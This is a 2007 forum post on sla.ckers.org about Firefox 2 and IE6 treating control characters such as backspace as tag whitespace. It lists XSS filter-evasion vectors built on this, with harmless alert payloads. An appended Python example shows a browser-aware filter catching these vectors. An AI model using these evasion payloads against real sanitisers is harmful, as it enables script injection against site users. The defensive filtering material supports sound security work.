Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
non alpha non digit
Posted by: tx
Date: July 04, 2007 02:23AM

I was playing around with the non-alpha-non-digit vectors and I found some changes in FF (2.0.0.4)
For instance <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> will no longer work; however, there are certain characters that are still treated as whitespace. Namely BS, HT, NL, VT, NP & CR:

Characters 08,09,10,11,12,13 can follow the word script in a script tag.
Example: <script[BS]>alert(8)</script>

Characters 08,09 can follow the word script in the closing script tag
Example: <script>alert(8)</script[BS]>

Characters 08,09,10,13 can be placed between the tagname and any attributes instead of a space (I've tested this with <script>,<p>,<body>,<div> and <textarea> tags.)
Examples: <textarea[BS]onmouseover="this.style.backgroundColor='#f02';">xss!</textarea>
<script[BS]src='xss.js'></script>

Additionally, characters 08,09,10 & 13 can follow = after an event handler.

Example: <textarea onmouseover=[BS]"this.style.backgroundColor='#f02';">xss!</textarea>

IE6 treats all of the above characters as whitespace as well, except BS.

I made an html page here: http://tx.lowtechlive.com/nand.html

EDIT: Since the characters display properly, in the above examples [BS] represents the backspace character (%08)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/04/2007 02:30AM by tx.

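The post's observations matter for anyone writing or reviewing an HTML filter: a check that assumes only a space, a tab or `>` can follow a tag name or an `=` will not see `<script[BS]>` or `onmouseover=[BS]"..."` the way Firefox 2.0.0.4 does. The following is an added example (not from tx or the thread) contrasting a naive regex check with one that treats the six control characters from the post as tag whitespace. The sample strings are constructed here from the vectors above, with `\x08` standing in for [BS]; the function names are this example's own.

```python
import re

# Control characters the post reports Firefox 2.0.0.4 treating as whitespace
# inside a tag: BS (0x08), HT (0x09), NL (0x0A), VT (0x0B), NP/FF (0x0C), CR (0x0D).
# IE6 is reported to do the same for all of them except BS.
BROWSER_TAG_WHITESPACE = "\x08\x09\x0a\x0b\x0c\x0d"

# Everything that can separate a tag name from its attributes, as the browser sees it.
_SEPARATORS = BROWSER_TAG_WHITESPACE + " "
# Everything that can end a tag name.
_NAME_END = _SEPARATORS + "/>"


def naive_has_script_tag(html: str) -> bool:
    """A typical 'strict' check: '<script' followed by whitespace or '>'.

    Python's \\s matches space and 0x09-0x0D but NOT backspace (0x08), so
    '<script\\x08>' slips past this check even though the post shows
    Firefox 2 executing it.
    """
    return re.search(r"<script(?:\s|>)", html, re.IGNORECASE) is not None


def normalize_tag_whitespace(html: str) -> str:
    """Map every character the browser treats as tag whitespace to a plain
    space so that a downstream filter sees the markup the way the browser does."""
    return html.translate({ord(c): " " for c in BROWSER_TAG_WHITESPACE})


def find_tag_names(html: str) -> list:
    """Tag names as the browser reads them: a name ends at '/', '>', space,
    or any of the control characters above (backspace included)."""
    pattern = rf"</?([^{_NAME_END}<]+)"
    return [m.group(1).lower() for m in re.finditer(pattern, html)]


def find_event_handlers(html: str) -> list:
    """Attribute names starting with 'on' that carry a value, allowing browser
    whitespace before the name and between the name and '='."""
    handlers = []
    for tag in re.finditer(r"<[^>]*>", html):
        # Any separator, backspace included, may precede an attribute name.
        attr_re = rf"[{_SEPARATORS}](on[a-z]+)[{_SEPARATORS}]*="
        for attr in re.finditer(attr_re, tag.group(0), re.IGNORECASE):
            handlers.append(attr.group(1).lower())
    return handlers


def is_dangerous(html: str) -> bool:
    """The decision a browser-aware filter would make: reject a script tag
    or any inline event handler, however the separators are spelled."""
    return "script" in find_tag_names(html) or bool(find_event_handlers(html))


# Constructed samples mirroring the vectors in the post ([BS] = \x08).
SAMPLES = {
    "plain": '<script>alert(8)</script>',
    "bs_after_name": '<script\x08>alert(8)</script\x08>',
    "bs_before_attr": "<script\x08src='xss.js'></script>",
    "bs_after_equals": '<textarea onmouseover=\x08"this.style.backgroundColor=\'#f02\';">xss!</textarea>',
    "benign": '<p class="note">hello</p>',
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:16} naive={naive_has_script_tag(sample)!s:5} "
              f"browser_aware={is_dangerous(sample)}")
```

Run as-is, the naive check reports only the `plain` sample, while the browser-aware functions flag all three backspace variants and leave the benign paragraph alone. The practical takeaway is the `normalize_tag_whitespace` step: canonicalising the 0x08-0x0D range to a space before any pattern matching lets an existing filter see `<script[BS]>` as `<script >`, which is what the browser effectively parses.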